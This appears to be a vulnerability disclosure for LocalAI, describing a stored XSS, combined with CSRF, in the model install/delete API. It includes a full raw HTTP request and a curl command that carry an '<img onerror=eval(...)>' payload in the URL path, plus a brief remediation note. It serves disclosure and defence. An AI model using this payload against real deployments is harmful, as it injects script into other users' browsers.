LocalAI deleted model with storage XSS&SCRF vulnerability.When calling the delete model API and passing inappropriate parameters, it can cause a one-time storage XSS, which will trigger the payload when a user accesses the homepage.
Use the POST package below for payload storage.
POST /browse/install/model/<img src=x onerror=eval("alert(1)")> HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 0
HX-Request: true
HX-Current-URL: <http://127.0.0.1:8080/>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: <http://127.0.0.1:8080>
Referer: <http://127.0.0.1:8080/>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Then we can access the homepage to trigger the XSS.
https://github.com/user-attachments/assets/25966abe-46e9-4249-b244-66f00f5c865d
On the console, it can be seen that CSRF also exists, and the active combination of XSS and CSRF is believed to achieve automatic triggering.
https://github.com/user-attachments/assets/24b50adc-b7ab-4a61-ad49-3003abaf1e00
(The payload src param is "x" , just for test.)
Strictly control URL parameters, allowing only numbers, letters, and some special symbols.
curl -v -X POST "<http://127.0.0.1:8080/browse/install/model/><img src=x onerror=eval('alert(1)')>" \\
-H "Host: 127.0.0.1:8080" \\
-H "HX-Request: true" \\
-H "HX-Current-URL: <http://127.0.0.1:8080/>" \\
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" \\
-H "Content-Type: application/x-www-form-urlencoded" \\
-H "Accept: */*" \\
-H "Origin: <http://127.0.0.1:8080>" \\
-H "Referer: <http://127.0.0.1:8080/>" \\
-H "Accept-Encoding: gzip, deflate" \\
-H "Accept-Language: zh-CN,zh;q=0.9" \\
-H "Connection: close" \\
--data ""
1.This vulnerability allows for the storage and execution of malicious JavaScript code. 2.Automated malicious requests